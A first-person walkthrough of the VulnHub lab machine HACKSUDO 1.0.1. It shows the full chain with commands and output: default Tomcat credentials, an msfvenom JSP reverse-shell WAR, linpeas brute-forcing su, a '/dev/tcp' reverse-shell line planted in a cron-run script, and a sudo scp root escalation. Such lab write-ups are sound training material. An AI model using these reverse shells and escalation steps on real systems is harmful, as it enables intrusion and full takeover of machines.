HACKSUDO: 1.0.1

I was away for a couple of days. I try to do some practice everyday; the first day I did SimpleCTF from THM on my phone (I had no computer with me) which was kind of a pain in the ass but I got it done; next day I did a little bit of OverTheWire. Now I’m home again and decided to do this one, because some guy on the VulnHub discord said:

Hacksudo 1.1 really hamring , quite difficult I took 2 day to solved

Well either he was having a bad day or I had a good one because it took me about 90 minutes.

This is HACKSUDO: 1.0.1 from Vulnhub. The page doesn’t indicate whether it was supposed to be difficult or not; I suspect not.

Ports

SSH on 2222, plus HTTP on ports 80 and 8080.

HTTP/80

There is a lot going on here; it’s designed around an online store. Stacks of pages - mostly PHP - many of which display the page source and show lots of stuff about MySQL which makes you think SQLi. I tried sqlmap on about three different things, but to no avail. Example:

$sql = "INSERT INTO products(product_code,product_name,category,fandom,price,product_qty) VALUES ('$code','$name','$cat','$fan','$fees','$quant')";  
if (mysqli_query($mysqli,$sql)){    

etc.

HTTP/8080

We have Apache Tomcat. Putting aside the other port for a while, I try some default creds and bingo! we get a hit with tomcat:tomcat. Once we get that we can create a WAR file:

┌──(root💀kali)-[/opt/vulnhub/hacksudo1]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.192 LPORT=1234 -f war > shell.war
Payload size: 1090 bytes
Final size of war file: 1090 bytes

Then upload it with the browser and navigate to it to trigger our shell:

┌──(root💀kali)-[/opt/vulnhub/hacksudo1]
└─# nc -nvlp 1234                                               
listening on [any] 1234 ...
connect to [192.168.1.192] from (UNKNOWN) [192.168.1.196] 50916
id
uid=1003(tomcat) gid=1003(tomcat) groups=1003(tomcat)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash");'
tomcat@hacksudo:/$

Vishal

Some poking around and looking in home directories etc reveals we probably need to become Vishal, but we don’t have a password (yet). Linpeas to the rescue:

tomcat@hacksudo:/dev/shm$ ./linpeas.sh -a
./linpeas.sh -a
# run with the -a switch to bruteforce su
# and in nice red text with a yellow background we see: 
You can login as vishal using password: hacker

We can then SSH in:

┌──(root💀kali)-[/opt/vulnhub/hacksudo1]
└─# ssh -p 2222 vishal@192.168.1.196         
The authenticity of host '[192.168.1.196]:2222 ([192.168.1.196]:2222)' can't be established.
ECDSA key fingerprint is SHA256:4kVNg3U+m3j2fjVDoWMqwHsiq9EXZpLkXWmRAIDUYqI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.1.196]:2222' (ECDSA) to the list of known hosts.
vishal@192.168.1.196's password: 
Welcome to Ubuntu 20.10 (GNU/Linux 5.8.0-41-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Apr 12 10:42:22 AM UTC 2021

# cruft removed for brevity

Last login: Tue Mar 30 17:03:31 2021 from 192.168.43.216
vishal@hacksudo:~$

Hacksudo

I’d seen from linpeas that we had a cronjob running as hacksudo every minute:

*/1 * * * * hacksudo /home/hacksudo/./getmanager

And looking through the files it was obvious that the getmanager binary was calling this file:

4.0K -rwxrwxr-x 1 vishal vishal 357 Apr 12 10:43 manage.sh

So we add a line and wait:

vishal@hacksudo:~/office$ cat manage.sh 
#!/bin/bash
echo  -e "\033[33;5;7mhey hacker great job!\033[0m"
echo "hey  vishal are you ready to get manager access ?(Y/N)"
read  input
echo "did you  recon your tasked access ? (Y/N)"
read input
echo  -e "\033[33;5;7myou have  1 minute to figure out!\033[0m"

echo  -e "\033[33;5;7m try to boommmm!!!!\033[0m"
bash -i >& /dev/tcp/192.168.1.192/1235 0>&1

Root

Here’s our shell, and the path to root:

┌──(root💀kali)-[/opt/vulnhub/hacksudo1]
└─# nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.1.192] from (UNKNOWN) [192.168.1.196] 51172
bash: cannot set terminal process group (149327): Inappropriate ioctl for device
bash: no job control in this shell
hacksudo@hacksudo:~$ python3 -c 'import pty;pty.spawn("/bin/bash");'
python3 -c 'import pty;pty.spawn("/bin/bash");'
# get user.txt here if you want it
hacksudo@hacksudo:~$ sudo -l
sudo -l
Matching Defaults entries for hacksudo on hacksudo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hacksudo may run the following commands on hacksudo:
    (root) NOPASSWD: /usr/bin/scp

And then it’s just GTFOBins:

hacksudo@hacksudo:~$ TF=$(mktemp)
TF=$(mktemp)
hacksudo@hacksudo:~$ echo 'sh 0<&2 1>&2' > $TF
echo 'sh 0<&2 1>&2' > $TF
hacksudo@hacksudo:~$ chmod +x "$TF"
chmod +x "$TF"
hacksudo@hacksudo:~$ sudo -u root /usr/bin/scp -S $TF x y:
sudo -u root /usr/bin/scp -S $TF x y:
# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
hacksudo
Mon Apr 12 10:47:11 AM UTC 2021

And that was that.